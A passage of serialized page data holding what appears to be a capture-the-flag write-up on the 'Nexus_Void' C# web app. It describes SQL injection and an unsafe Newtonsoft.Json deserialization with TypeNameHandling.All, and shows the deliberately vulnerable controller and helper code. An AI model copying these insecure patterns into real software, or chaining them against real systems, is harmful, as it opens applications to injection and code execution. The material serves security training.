VALUES(",{"type":33,"tag":128,"props":36403,"children":36404},{"style":312},[36405],{"type":38,"value":7246},{"type":33,"tag":128,"props":36407,"children":36408},{"style":140},[36409],{"type":38,"value":35163},{"type":33,"tag":128,"props":36411,"children":36412},{"style":312},[36413],{"type":38,"value":5730},{"type":33,"tag":128,"props":36415,"children":36416},{"style":140},[36417],{"type":38,"value":36418},",'",{"type":33,"tag":128,"props":36420,"children":36421},{"style":312},[36422],{"type":38,"value":7246},{"type":33,"tag":128,"props":36424,"children":36425},{"style":140},[36426],{"type":38,"value":29798},{"type":33,"tag":128,"props":36428,"children":36429},{"style":312},[36430],{"type":38,"value":5730},{"type":33,"tag":128,"props":36432,"children":36433},{"style":140},[36434],{"type":38,"value":36435},"', '",{"type":33,"tag":128,"props":36437,"children":36438},{"style":312},[36439],{"type":38,"value":7246},{"type":33,"tag":128,"props":36441,"children":36442},{"style":140},[36443],{"type":38,"value":36109},{"type":33,"tag":128,"props":36445,"children":36446},{"style":312},[36447],{"type":38,"value":5730},{"type":33,"tag":128,"props":36449,"children":36450},{"style":140},[36451],{"type":38,"value":36452},"')",{"type":33,"tag":128,"props":36454,"children":36455},{"style":676},[36456],{"type":38,"value":669},{"type":33,"tag":128,"props":36458,"children":36459},{"style":312},[36460],{"type":38,"value":35231},{"type":33,"tag":128,"props":36462,"children":36463},{"style":5541},[36464],{"type":38,"value":35236},{"type":33,"tag":128,"props":36466,"children":36467},{"class":130,"line":11270},[36468,36472,36476,36480,36484,36488,36492,36496],{"type":33,"tag":128,"props":36469,"children":36470},{"style":306},[36471],{"type":38,"value":36150},{"type":33,"tag":128,"props":36473,"children":36474},{"style":312},[36475],{"type":38,"value":215},{"type":33,"tag":128,"props":36477,"children":36478},{"style":306},[36479],{"type":38,"value":36159},{"type":33,"tag":128,"props":36481,
"children":36482},{"style":312},[36483],{"type":38,"value":215},{"type":33,"tag":128,"props":36485,"children":36486},{"style":135},[36487],{"type":38,"value":36168},{"type":33,"tag":128,"props":36489,"children":36490},{"style":312},[36491],{"type":38,"value":5566},{"type":33,"tag":128,"props":36493,"children":36494},{"style":306},[36495],{"type":38,"value":36177},{"type":33,"tag":128,"props":36497,"children":36498},{"style":312},[36499],{"type":38,"value":5815},{"type":33,"tag":128,"props":36501,"children":36502},{"class":130,"line":11278},[36503],{"type":33,"tag":128,"props":36504,"children":36505},{"style":312},[36506],{"type":38,"value":15318},{"type":33,"tag":128,"props":36508,"children":36509},{"class":130,"line":11334},[36510,36514,36518,36522,36526,36531,36535],{"type":33,"tag":128,"props":36511,"children":36512},{"style":1576},[36513],{"type":38,"value":13615},{"type":33,"tag":128,"props":36515,"children":36516},{"style":135},[36517],{"type":38,"value":35967},{"type":33,"tag":128,"props":36519,"children":36520},{"style":312},[36521],{"type":38,"value":5566},{"type":33,"tag":128,"props":36523,"children":36524},{"style":676},[36525],{"type":38,"value":669},{"type":33,"tag":128,"props":36527,"children":36528},{"style":140},[36529],{"type":38,"value":36530},"Added",{"type":33,"tag":128,"props":36532,"children":36533},{"style":676},[36534],{"type":38,"value":669},{"type":33,"tag":128,"props":36536,"children":36537},{"style":312},[36538],{"type":38,"value":5815},{"type":33,"tag":128,"props":36540,"children":36541},{"class":130,"line":11375},[36542],{"type":33,"tag":128,"props":36543,"children":36544},{"style":312},[36545],{"type":38,"value":6760},{"type":33,"tag":128,"props":36547,"children":36548},{"class":130,"line":11383},[36549,36553,36557,36561,36565,36569,36573],{"type":33,"tag":128,"props":36550,"children":36551},{"style":1576},[36552],{"type":38,"value":6810},{"type":33,"tag":128,"props":36554,"children":36555},{"style":135},[36556],{"type":38,"value":3596
7},{"type":33,"tag":128,"props":36558,"children":36559},{"style":312},[36560],{"type":38,"value":5566},{"type":33,"tag":128,"props":36562,"children":36563},{"style":676},[36564],{"type":38,"value":669},{"type":33,"tag":128,"props":36566,"children":36567},{"style":140},[36568],{"type":38,"value":6970},{"type":33,"tag":128,"props":36570,"children":36571},{"style":676},[36572],{"type":38,"value":669},{"type":33,"tag":128,"props":36574,"children":36575},{"style":312},[36576],{"type":38,"value":5815},{"type":33,"tag":128,"props":36578,"children":36579},{"class":130,"line":11392},[36580],{"type":33,"tag":128,"props":36581,"children":36582},{"style":312},[36583],{"type":38,"value":854},{"type":33,"tag":47,"props":36585,"children":36586},{},[36587],{"type":38,"value":36588},"We can also see that SQL injections are present in select, insert, and update queries. The problem now is that the flag is not found in the database, so we need to use this SQL injection to our advantage to exploit another vulnerability. That's what we're going to see in the next section.",{"type":33,"tag":40,"props":36590,"children":36592},{"id":36591},"deserialization",[36593],{"type":38,"value":36594},"Deserialization",{"type":33,"tag":47,"props":36596,"children":36597},{},[36598],{"type":38,"value":36599},"Our first impression when discovering these SQLi was to exploit arbitrary file reading or remote code execution directly from an SQLi. 
However, since no SQLite module was loaded, we were unable to exploit this way.",{"type":33,"tag":47,"props":36601,"children":36602},{},[36603],{"type":38,"value":36604},"While navigating through the code, we can realize something quite peculiar, a serialization and deserialization is performed directly from the response of an SQL query.",{"type":33,"tag":114,"props":36606,"children":36607},{"lang":35074},[36608],{"type":33,"tag":119,"props":36609,"children":36611},{"code":36610,"language":35074,"meta":8,"className":35079,"style":8},"[HttpGet]\npublic IActionResult Wishlist()\n{\n    string ID = HttpContext.Items[\"ID\"].ToString();\n    string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\";\n    var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n\n    if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n    {\n        // Here we can see an deserialization directly from the database result\n        List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n        return View(products);\n\n    }\n    
[...]\n}\n",[36612],{"type":33,"tag":105,"props":36613,"children":36614},{"__ignoreMap":8},[36615,36631,36650,36657,36712,36759,36814,36821,36884,36891,36899,36958,36982,36989,36996,37015],{"type":33,"tag":128,"props":36616,"children":36617},{"class":130,"line":131},[36618,36622,36627],{"type":33,"tag":128,"props":36619,"children":36620},{"style":312},[36621],{"type":38,"value":344},{"type":33,"tag":128,"props":36623,"children":36624},{"style":30339},[36625],{"type":38,"value":36626},"HttpGet",{"type":33,"tag":128,"props":36628,"children":36629},{"style":312},[36630],{"type":38,"value":3262},{"type":33,"tag":128,"props":36632,"children":36633},{"class":130,"line":362},[36634,36638,36642,36646],{"type":33,"tag":128,"props":36635,"children":36636},{"style":300},[36637],{"type":38,"value":25953},{"type":33,"tag":128,"props":36639,"children":36640},{"style":30339},[36641],{"type":38,"value":35103},{"type":33,"tag":128,"props":36643,"children":36644},{"style":135},[36645],{"type":38,"value":35108},{"type":33,"tag":128,"props":36647,"children":36648},{"style":312},[36649],{"type":38,"value":7857},{"type":33,"tag":128,"props":36651,"children":36652},{"class":130,"line":403},[36653],{"type":33,"tag":128,"props":36654,"children":36655},{"style":312},[36656],{"type":38,"value":650},{"type":33,"tag":128,"props":36658,"children":36659},{"class":130,"line":739},[36660,36664,36668,36672,36676,36680,36684,36688,36692,36696,36700,36704,36708],{"type":33,"tag":128,"props":36661,"children":36662},{"style":1576},[36663],{"type":38,"value":35127},{"type":33,"tag":128,"props":36665,"children":36666},{"style":135},[36667],{"type":38,"value":35132},{"type":33,"tag":128,"props":36669,"children":36670},{"style":312},[36671],{"type":38,"value":5657},{"type":33,"tag":128,"props":36673,"children":36674},{"style":306},[36675],{"type":38,"value":35141},{"type":33,"tag":128,"props":36677,"children":36678},{"style":312},[36679],{"type":38,"value":215},{"type":33,"tag":128,"props":36681,"children":
36682},{"style":306},[36683],{"type":38,"value":35150},{"type":33,"tag":128,"props":36685,"children":36686},{"style":312},[36687],{"type":38,"value":344},{"type":33,"tag":128,"props":36689,"children":36690},{"style":676},[36691],{"type":38,"value":669},{"type":33,"tag":128,"props":36693,"children":36694},{"style":140},[36695],{"type":38,"value":35163},{"type":33,"tag":128,"props":36697,"children":36698},{"style":676},[36699],{"type":38,"value":669},{"type":33,"tag":128,"props":36701,"children":36702},{"style":312},[36703],{"type":38,"value":8230},{"type":33,"tag":128,"props":36705,"children":36706},{"style":135},[36707],{"type":38,"value":35176},{"type":33,"tag":128,"props":36709,"children":36710},{"style":312},[36711],{"type":38,"value":15496},{"type":33,"tag":128,"props":36713,"children":36714},{"class":130,"line":765},[36715,36719,36723,36727,36731,36735,36739,36743,36747,36751,36755],{"type":33,"tag":128,"props":36716,"children":36717},{"style":1576},[36718],{"type":38,"value":35127},{"type":33,"tag":128,"props":36720,"children":36721},{"style":135},[36722],{"type":38,"value":35192},{"type":33,"tag":128,"props":36724,"children":36725},{"style":312},[36726],{"type":38,"value":5657},{"type":33,"tag":128,"props":36728,"children":36729},{"style":676},[36730],{"type":38,"value":35201},{"type":33,"tag":128,"props":36732,"children":36733},{"style":140},[36734],{"type":38,"value":35206},{"type":33,"tag":128,"props":36736,"children":36737},{"style":312},[36738],{"type":38,"value":7246},{"type":33,"tag":128,"props":36740,"children":36741},{"style":140},[36742],{"type":38,"value":35163},{"type":33,"tag":128,"props":36744,"children":36745},{"style":312},[36746],{"type":38,"value":5730},{"type":33,"tag":128,"props":36748,"children":36749},{"style":140},[36750],{"type":38,"value":6040},{"type":33,"tag":128,"props":36752,"children":36753},{"style":676},[36754],{"type":38,"value":669},{"type":33,"tag":128,"props":36756,"children":36757},{"style":312},[36758],{"type":38,"value":
5676},{"type":33,"tag":128,"props":36760,"children":36761},{"class":130,"line":804},[36762,36766,36770,36774,36778,36782,36786,36790,36794,36798,36802,36806,36810],{"type":33,"tag":128,"props":36763,"children":36764},{"style":300},[36765],{"type":38,"value":35457},{"type":33,"tag":128,"props":36767,"children":36768},{"style":135},[36769],{"type":38,"value":35462},{"type":33,"tag":128,"props":36771,"children":36772},{"style":312},[36773],{"type":38,"value":5657},{"type":33,"tag":128,"props":36775,"children":36776},{"style":306},[36777],{"type":38,"value":35471},{"type":33,"tag":128,"props":36779,"children":36780},{"style":312},[36781],{"type":38,"value":215},{"type":33,"tag":128,"props":36783,"children":36784},{"style":306},[36785],{"type":38,"value":35480},{"type":33,"tag":128,"props":36787,"children":36788},{"style":312},[36789],{"type":38,"value":215},{"type":33,"tag":128,"props":36791,"children":36792},{"style":135},[36793],{"type":38,"value":35489},{"type":33,"tag":128,"props":36795,"children":36796},{"style":312},[36797],{"type":38,"value":5566},{"type":33,"tag":128,"props":36799,"children":36800},{"style":306},[36801],{"type":38,"value":35498},{"type":33,"tag":128,"props":36803,"children":36804},{"style":312},[36805],{"type":38,"value":6700},{"type":33,"tag":128,"props":36807,"children":36808},{"style":135},[36809],{"type":38,"value":35507},{"type":33,"tag":128,"props":36811,"children":36812},{"style":312},[36813],{"type":38,"value":15496},{"type":33,"tag":128,"props":36815,"children":36816},{"class":130,"line":839},[36817],{"type":33,"tag":128,"props":36818,"children":36819},{"emptyLinePlaceholder":896},[36820],{"type":38,"value":899},{"type":33,"tag":128,"props":36822,"children":36823},{"class":130,"line":848},[36824,36828,36832,36836,36840,36844,36848,36852,36856,36860,36864,36868,36872,36876,36880],{"type":33,"tag":128,"props":36825,"children":36826},{"style":1576},[36827],{"type":38,"value":6625},{"type":33,"tag":128,"props":36829,"children":36830},{"styl
e":312},[36831],{"type":38,"value":2852},{"type":33,"tag":128,"props":36833,"children":36834},{"style":306},[36835],{"type":38,"value":35712},{"type":33,"tag":128,"props":36837,"children":36838},{"style":300},[36839],{"type":38,"value":35717},{"type":33,"tag":128,"props":36841,"children":36842},{"style":300},[36843],{"type":38,"value":35722},{"type":33,"tag":128,"props":36845,"children":36846},{"style":300},[36847],{"type":38,"value":10037},{"type":33,"tag":128,"props":36849,"children":36850},{"style":300},[36851],{"type":38,"value":35731},{"type":33,"tag":128,"props":36853,"children":36854},{"style":1576},[36855],{"type":38,"value":35317},{"type":33,"tag":128,"props":36857,"children":36858},{"style":312},[36859],{"type":38,"value":215},{"type":33,"tag":128,"props":36861,"children":36862},{"style":135},[36863],{"type":38,"value":35668},{"type":33,"tag":128,"props":36865,"children":36866},{"style":312},[36867],{"type":38,"value":5566},{"type":33,"tag":128,"props":36869,"children":36870},{"style":306},[36871],{"type":38,"value":35712},{"type":33,"tag":128,"props":36873,"children":36874},{"style":312},[36875],{"type":38,"value":215},{"type":33,"tag":128,"props":36877,"children":36878},{"style":306},[36879],{"type":38,"value":2815},{"type":33,"tag":128,"props":36881,"children":36882},{"style":312},[36883],{"type":38,"value":2459},{"type":33,"tag":128,"props":36885,"children":36886},{"class":130,"line":976},[36887],{"type":33,"tag":128,"props":36888,"children":36889},{"style":312},[36890],{"type":38,"value":12699},{"type":33,"tag":128,"props":36892,"children":36893},{"class":130,"line":988},[36894],{"type":33,"tag":128,"props":36895,"children":36896},{"style":5541},[36897],{"type":38,"value":36898},"        // Here we can see an deserialization directly from the database 
result\n",{"type":33,"tag":128,"props":36900,"children":36901},{"class":130,"line":1001},[36902,36906,36910,36914,36918,36922,36926,36930,36934,36938,36942,36946,36950,36954],{"type":33,"tag":128,"props":36903,"children":36904},{"style":30339},[36905],{"type":38,"value":26623},{"type":33,"tag":128,"props":36907,"children":36908},{"style":312},[36909],{"type":38,"value":5977},{"type":33,"tag":128,"props":36911,"children":36912},{"style":30339},[36913],{"type":38,"value":35788},{"type":33,"tag":128,"props":36915,"children":36916},{"style":312},[36917],{"type":38,"value":6054},{"type":33,"tag":128,"props":36919,"children":36920},{"style":135},[36921],{"type":38,"value":35797},{"type":33,"tag":128,"props":36923,"children":36924},{"style":312},[36925],{"type":38,"value":5657},{"type":33,"tag":128,"props":36927,"children":36928},{"style":306},[36929],{"type":38,"value":35806},{"type":33,"tag":128,"props":36931,"children":36932},{"style":312},[36933],{"type":38,"value":215},{"type":33,"tag":128,"props":36935,"children":36936},{"style":135},[36937],{"type":38,"value":35815},{"type":33,"tag":128,"props":36939,"children":36940},{"style":312},[36941],{"type":38,"value":5566},{"type":33,"tag":128,"props":36943,"children":36944},{"style":306},[36945],{"type":38,"value":35712},{"type":33,"tag":128,"props":36947,"children":36948},{"style":312},[36949],{"type":38,"value":215},{"type":33,"tag":128,"props":36951,"children":36952},{"style":306},[36953],{"type":38,"value":2815},{"type":33,"tag":128,"props":36955,"children":36956},{"style":312},[36957],{"type":38,"value":5815},{"type":33,"tag":128,"props":36959,"children":36960},{"class":130,"line":1014},[36961,36965,36970,36974,36978],{"type":33,"tag":128,"props":36962,"children":36963},{"style":1576},[36964],{"type":38,"value":13615},{"type":33,"tag":128,"props":36966,"children":36967},{"style":135},[36968],{"type":38,"value":36969}," 
View",{"type":33,"tag":128,"props":36971,"children":36972},{"style":312},[36973],{"type":38,"value":5566},{"type":33,"tag":128,"props":36975,"children":36976},{"style":306},[36977],{"type":38,"value":36071},{"type":33,"tag":128,"props":36979,"children":36980},{"style":312},[36981],{"type":38,"value":5815},{"type":33,"tag":128,"props":36983,"children":36984},{"class":130,"line":1026},[36985],{"type":33,"tag":128,"props":36986,"children":36987},{"emptyLinePlaceholder":896},[36988],{"type":38,"value":899},{"type":33,"tag":128,"props":36990,"children":36991},{"class":130,"line":1038},[36992],{"type":33,"tag":128,"props":36993,"children":36994},{"style":312},[36995],{"type":38,"value":6760},{"type":33,"tag":128,"props":36997,"children":36998},{"class":130,"line":1051},[36999,37003,37007,37011],{"type":33,"tag":128,"props":37000,"children":37001},{"style":312},[37002],{"type":38,"value":35251},{"type":33,"tag":128,"props":37004,"children":37005},{"style":300},[37006],{"type":38,"value":35256},{"type":33,"tag":128,"props":37008,"children":37009},{"style":323},[37010],{"type":38,"value":215},{"type":33,"tag":128,"props":37012,"children":37013},{"style":312},[37014],{"type":38,"value":3262},{"type":33,"tag":128,"props":37016,"children":37017},{"class":130,"line":1063},[37018],{"type":33,"tag":128,"props":37019,"children":37020},{"style":312},[37021],{"type":38,"value":854},{"type":33,"tag":47,"props":37023,"children":37024},{},[37025],{"type":38,"value":37026},"And the SerializeHelper class is as follows:",{"type":33,"tag":114,"props":37028,"children":37029},{"lang":35074},[37030],{"type":33,"tag":119,"props":37031,"children":37033},{"code":37032,"language":35074,"meta":8,"className":35079,"style":8},"using Newtonsoft.Json;\nusing Nexus_Void.Models;\n\nnamespace Nexus_Void.Helpers\n{\n    public class SerializeHelper\n    {\n        public static string Serialize(List\u003CProductModel> list)\n        {\n            string serializedResult = 
JsonConvert.SerializeObject(list, new JsonSerializerSettings\n            {\n                TypeNameHandling = TypeNameHandling.All\n            });\n\n            string encodedData = EncodeHelper.Encode(serializedResult);\n            return encodedData;\n        }\n\n        public static List\u003CProductModel> Deserialize(string str) \n        {\n            string decodedData = EncodeHelper.Decode(str);\n            \n            // unsafe deserialization\n            var deserialized = JsonConvert.DeserializeObject(decodedData, new JsonSerializerSettings\n            {\n                TypeNameHandling = TypeNameHandling.All\n            });\n\n            List\u003CProductModel> products = deserialized as List\u003CProductModel>;\n\n            return products;\n        }\n    }\n}\n",[37034],{"type":33,"tag":105,"props":37035,"children":37036},{"__ignoreMap":8},[37037,37063,37088,37095,37116,37123,37140,37147,37197,37204,37256,37263,37289,37297,37304,37347,37362,37369,37376,37429,37436,37478,37486,37494,37545,37552,37575,37582,37589,37641,37648,37663,37670,37677],{"type":33,"tag":128,"props":37038,"children":37039},{"class":130,"line":131},[37040,37045,37050,37054,37059],{"type":33,"tag":128,"props":37041,"children":37042},{"style":1576},[37043],{"type":38,"value":37044},"using",{"type":33,"tag":128,"props":37046,"children":37047},{"style":30339},[37048],{"type":38,"value":37049}," 
Newtonsoft",{"type":33,"tag":128,"props":37051,"children":37052},{"style":312},[37053],{"type":38,"value":215},{"type":33,"tag":128,"props":37055,"children":37056},{"style":30339},[37057],{"type":38,"value":37058},"Json",{"type":33,"tag":128,"props":37060,"children":37061},{"style":312},[37062],{"type":38,"value":5676},{"type":33,"tag":128,"props":37064,"children":37065},{"class":130,"line":362},[37066,37070,37075,37079,37084],{"type":33,"tag":128,"props":37067,"children":37068},{"style":1576},[37069],{"type":38,"value":37044},{"type":33,"tag":128,"props":37071,"children":37072},{"style":30339},[37073],{"type":38,"value":37074}," Nexus_Void",{"type":33,"tag":128,"props":37076,"children":37077},{"style":312},[37078],{"type":38,"value":215},{"type":33,"tag":128,"props":37080,"children":37081},{"style":30339},[37082],{"type":38,"value":37083},"Models",{"type":33,"tag":128,"props":37085,"children":37086},{"style":312},[37087],{"type":38,"value":5676},{"type":33,"tag":128,"props":37089,"children":37090},{"class":130,"line":403},[37091],{"type":33,"tag":128,"props":37092,"children":37093},{"emptyLinePlaceholder":896},[37094],{"type":38,"value":899},{"type":33,"tag":128,"props":37096,"children":37097},{"class":130,"line":739},[37098,37103,37107,37111],{"type":33,"tag":128,"props":37099,"children":37100},{"style":300},[37101],{"type":38,"value":37102},"namespace",{"type":33,"tag":128,"props":37104,"children":37105},{"style":30339},[37106],{"type":38,"value":37074},{"type":33,"tag":128,"props":37108,"children":37109},{"style":312},[37110],{"type":38,"value":215},{"type":33,"tag":128,"props":37112,"children":37113},{"style":30339},[37114],{"type":38,"value":37115},"Helpers\n",{"type":33,"tag":128,"props":37117,"children":37118},{"class":130,"line":765},[37119],{"type":33,"tag":128,"props":37120,"children":37121},{"style":312},[37122],{"type":38,"value":650},{"type":33,"tag":128,"props":37124,"children":37125},{"class":130,"line":804},[37126,37131,37135],{"type":33,"tag":128,"
props":37127,"children":37128},{"style":300},[37129],{"type":38,"value":37130},"    public",{"type":33,"tag":128,"props":37132,"children":37133},{"style":300},[37134],{"type":38,"value":6009},{"type":33,"tag":128,"props":37136,"children":37137},{"style":30339},[37138],{"type":38,"value":37139}," SerializeHelper\n",{"type":33,"tag":128,"props":37141,"children":37142},{"class":130,"line":839},[37143],{"type":33,"tag":128,"props":37144,"children":37145},{"style":312},[37146],{"type":38,"value":12699},{"type":33,"tag":128,"props":37148,"children":37149},{"class":130,"line":848},[37150,37155,37159,37163,37168,37172,37177,37181,37185,37189,37193],{"type":33,"tag":128,"props":37151,"children":37152},{"style":300},[37153],{"type":38,"value":37154},"        public",{"type":33,"tag":128,"props":37156,"children":37157},{"style":300},[37158],{"type":38,"value":25958},{"type":33,"tag":128,"props":37160,"children":37161},{"style":1576},[37162],{"type":38,"value":35330},{"type":33,"tag":128,"props":37164,"children":37165},{"style":135},[37166],{"type":38,"value":37167}," 
Serialize",{"type":33,"tag":128,"props":37169,"children":37170},{"style":312},[37171],{"type":38,"value":5566},{"type":33,"tag":128,"props":37173,"children":37174},{"style":30339},[37175],{"type":38,"value":37176},"List",{"type":33,"tag":128,"props":37178,"children":37179},{"style":312},[37180],{"type":38,"value":5977},{"type":33,"tag":128,"props":37182,"children":37183},{"style":30339},[37184],{"type":38,"value":35788},{"type":33,"tag":128,"props":37186,"children":37187},{"style":312},[37188],{"type":38,"value":6054},{"type":33,"tag":128,"props":37190,"children":37191},{"style":135},[37192],{"type":38,"value":3675},{"type":33,"tag":128,"props":37194,"children":37195},{"style":312},[37196],{"type":38,"value":2427},{"type":33,"tag":128,"props":37198,"children":37199},{"class":130,"line":976},[37200],{"type":33,"tag":128,"props":37201,"children":37202},{"style":312},[37203],{"type":38,"value":35771},{"type":33,"tag":128,"props":37205,"children":37206},{"class":130,"line":988},[37207,37211,37216,37220,37225,37229,37234,37238,37243,37247,37251],{"type":33,"tag":128,"props":37208,"children":37209},{"style":1576},[37210],{"type":38,"value":36040},{"type":33,"tag":128,"props":37212,"children":37213},{"style":135},[37214],{"type":38,"value":37215}," serializedResult",{"type":33,"tag":128,"props":37217,"children":37218},{"style":312},[37219],{"type":38,"value":5657},{"type":33,"tag":128,"props":37221,"children":37222},{"style":306},[37223],{"type":38,"value":37224}," 
JsonConvert",{"type":33,"tag":128,"props":37226,"children":37227},{"style":312},[37228],{"type":38,"value":215},{"type":33,"tag":128,"props":37230,"children":37231},{"style":135},[37232],{"type":38,"value":37233},"SerializeObject",{"type":33,"tag":128,"props":37235,"children":37236},{"style":312},[37237],{"type":38,"value":5566},{"type":33,"tag":128,"props":37239,"children":37240},{"style":306},[37241],{"type":38,"value":37242},"list",{"type":33,"tag":128,"props":37244,"children":37245},{"style":312},[37246],{"type":38,"value":5584},{"type":33,"tag":128,"props":37248,"children":37249},{"style":300},[37250],{"type":38,"value":13061},{"type":33,"tag":128,"props":37252,"children":37253},{"style":30339},[37254],{"type":38,"value":37255}," JsonSerializerSettings\n",{"type":33,"tag":128,"props":37257,"children":37258},{"class":130,"line":1001},[37259],{"type":33,"tag":128,"props":37260,"children":37261},{"style":312},[37262],{"type":38,"value":35954},{"type":33,"tag":128,"props":37264,"children":37265},{"class":130,"line":1014},[37266,37271,37275,37280,37284],{"type":33,"tag":128,"props":37267,"children":37268},{"style":306},[37269],{"type":38,"value":37270},"                TypeNameHandling",{"type":33,"tag":128,"props":37272,"children":37273},{"style":312},[37274],{"type":38,"value":5657},{"type":33,"tag":128,"props":37276,"children":37277},{"style":306},[37278],{"type":38,"value":37279}," TypeNameHandling",{"type":33,"tag":128,"props":37281,"children":37282},{"style":312},[37283],{"type":38,"value":215},{"type":33,"tag":128,"props":37285,"children":37286},{"style":306},[37287],{"type":38,"value":37288},"All\n",{"type":33,"tag":128,"props":37290,"children":37291},{"class":130,"line":1026},[37292],{"type":33,"tag":128,"props":37293,"children":37294},{"style":312},[37295],{"type":38,"value":37296},"            
});\n",{"type":33,"tag":128,"props":37298,"children":37299},{"class":130,"line":1038},[37300],{"type":33,"tag":128,"props":37301,"children":37302},{"emptyLinePlaceholder":896},[37303],{"type":38,"value":899},{"type":33,"tag":128,"props":37305,"children":37306},{"class":130,"line":1051},[37307,37311,37316,37320,37325,37329,37334,37338,37343],{"type":33,"tag":128,"props":37308,"children":37309},{"style":1576},[37310],{"type":38,"value":36040},{"type":33,"tag":128,"props":37312,"children":37313},{"style":135},[37314],{"type":38,"value":37315}," encodedData",{"type":33,"tag":128,"props":37317,"children":37318},{"style":312},[37319],{"type":38,"value":5657},{"type":33,"tag":128,"props":37321,"children":37322},{"style":306},[37323],{"type":38,"value":37324}," EncodeHelper",{"type":33,"tag":128,"props":37326,"children":37327},{"style":312},[37328],{"type":38,"value":215},{"type":33,"tag":128,"props":37330,"children":37331},{"style":135},[37332],{"type":38,"value":37333},"Encode",{"type":33,"tag":128,"props":37335,"children":37336},{"style":312},[37337],{"type":38,"value":5566},{"type":33,"tag":128,"props":37339,"children":37340},{"style":306},[37341],{"type":38,"value":37342},"serializedResult",{"type":33,"tag":128,"props":37344,"children":37345},{"style":312},[37346],{"type":38,"value":5815},{"type":33,"tag":128,"props":37348,"children":37349},{"class":130,"line":1063},[37350,37354,37358],{"type":33,"tag":128,"props":37351,"children":37352},{"style":1576},[37353],{"type":38,"value":26723},{"type":33,"tag":128,"props":37355,"children":37356},{"style":306},[37357],{"type":38,"value":37315},{"type":33,"tag":128,"props":37359,"children":37360},{"style":312},[37361],{"type":38,"value":5676},{"type":33,"tag":128,"props":37363,"children":37364},{"class":130,"line":1076},[37365],{"type":33,"tag":128,"props":37366,"children":37367},{"style":312},[37368],{"type":38,"value":15318},{"type":33,"tag":128,"props":37370,"children":37371},{"class":130,"line":1089},[37372],{"type":33,"tag"
:128,"props":37373,"children":37374},{"emptyLinePlaceholder":896},[37375],{"type":38,"value":899},{"type":33,"tag":128,"props":37377,"children":37378},{"class":130,"line":1101},[37379,37383,37387,37391,37395,37399,37403,37408,37412,37416,37421,37425],{"type":33,"tag":128,"props":37380,"children":37381},{"style":300},[37382],{"type":38,"value":37154},{"type":33,"tag":128,"props":37384,"children":37385},{"style":300},[37386],{"type":38,"value":25958},{"type":33,"tag":128,"props":37388,"children":37389},{"style":30339},[37390],{"type":38,"value":36296},{"type":33,"tag":128,"props":37392,"children":37393},{"style":312},[37394],{"type":38,"value":5977},{"type":33,"tag":128,"props":37396,"children":37397},{"style":30339},[37398],{"type":38,"value":35788},{"type":33,"tag":128,"props":37400,"children":37401},{"style":312},[37402],{"type":38,"value":6054},{"type":33,"tag":128,"props":37404,"children":37405},{"style":135},[37406],{"type":38,"value":37407}," Deserialize",{"type":33,"tag":128,"props":37409,"children":37410},{"style":312},[37411],{"type":38,"value":5566},{"type":33,"tag":128,"props":37413,"children":37414},{"style":1576},[37415],{"type":38,"value":35317},{"type":33,"tag":128,"props":37417,"children":37418},{"style":135},[37419],{"type":38,"value":37420}," 
str",{"type":33,"tag":128,"props":37422,"children":37423},{"style":312},[37424],{"type":38,"value":2966},{"type":33,"tag":128,"props":37426,"children":37427},{"style":323},[37428],{"type":38,"value":2008},{"type":33,"tag":128,"props":37430,"children":37431},{"class":130,"line":1114},[37432],{"type":33,"tag":128,"props":37433,"children":37434},{"style":312},[37435],{"type":38,"value":35771},{"type":33,"tag":128,"props":37437,"children":37438},{"class":130,"line":1127},[37439,37443,37448,37452,37456,37460,37465,37469,37474],{"type":33,"tag":128,"props":37440,"children":37441},{"style":1576},[37442],{"type":38,"value":36040},{"type":33,"tag":128,"props":37444,"children":37445},{"style":135},[37446],{"type":38,"value":37447}," decodedData",{"type":33,"tag":128,"props":37449,"children":37450},{"style":312},[37451],{"type":38,"value":5657},{"type":33,"tag":128,"props":37453,"children":37454},{"style":306},[37455],{"type":38,"value":37324},{"type":33,"tag":128,"props":37457,"children":37458},{"style":312},[37459],{"type":38,"value":215},{"type":33,"tag":128,"props":37461,"children":37462},{"style":135},[37463],{"type":38,"value":37464},"Decode",{"type":33,"tag":128,"props":37466,"children":37467},{"style":312},[37468],{"type":38,"value":5566},{"type":33,"tag":128,"props":37470,"children":37471},{"style":306},[37472],{"type":38,"value":37473},"str",{"type":33,"tag":128,"props":37475,"children":37476},{"style":312},[37477],{"type":38,"value":5815},{"type":33,"tag":128,"props":37479,"children":37480},{"class":130,"line":1139},[37481],{"type":33,"tag":128,"props":37482,"children":37483},{"style":323},[37484],{"type":38,"value":37485},"            \n",{"type":33,"tag":128,"props":37487,"children":37488},{"class":130,"line":1152},[37489],{"type":33,"tag":128,"props":37490,"children":37491},{"style":5541},[37492],{"type":38,"value":37493},"            // unsafe 
deserialization\n",{"type":33,"tag":128,"props":37495,"children":37496},{"class":130,"line":1165},[37497,37502,37507,37511,37515,37519,37524,37528,37533,37537,37541],{"type":33,"tag":128,"props":37498,"children":37499},{"style":300},[37500],{"type":38,"value":37501},"            var",{"type":33,"tag":128,"props":37503,"children":37504},{"style":135},[37505],{"type":38,"value":37506}," deserialized",{"type":33,"tag":128,"props":37508,"children":37509},{"style":312},[37510],{"type":38,"value":5657},{"type":33,"tag":128,"props":37512,"children":37513},{"style":306},[37514],{"type":38,"value":37224},{"type":33,"tag":128,"props":37516,"children":37517},{"style":312},[37518],{"type":38,"value":215},{"type":33,"tag":128,"props":37520,"children":37521},{"style":135},[37522],{"type":38,"value":37523},"DeserializeObject",{"type":33,"tag":128,"props":37525,"children":37526},{"style":312},[37527],{"type":38,"value":5566},{"type":33,"tag":128,"props":37529,"children":37530},{"style":306},[37531],{"type":38,"value":37532},"decodedData",{"type":33,"tag":128,"props":37534,"children":37535},{"style":312},[37536],{"type":38,"value":5584},{"type":33,"tag":128,"props":37538,"children":37539},{"style":300},[37540],{"type":38,"value":13061},{"type":33,"tag":128,"props":37542,"children":37543},{"style":30339},[37544],{"type":38,"value":37255},{"type":33,"tag":128,"props":37546,"children":37547},{"class":130,"line":1177},[37548],{"type":33,"tag":128,"props":37549,"children":37550},{"style":312},[37551],{"type":38,"value":35954},{"type":33,"tag":128,"props":37553,"children":37554},{"class":130,"line":1189},[37555,37559,37563,37567,37571],{"type":33,"tag":128,"props":37556,"children":37557},{"style":306},[37558],{"type":38,"value":37270},{"type":33,"tag":128,"props":37560,"children":37561},{"style":312},[37562],{"type":38,"value":5657},{"type":33,"tag":128,"props":37564,"children":37565},{"style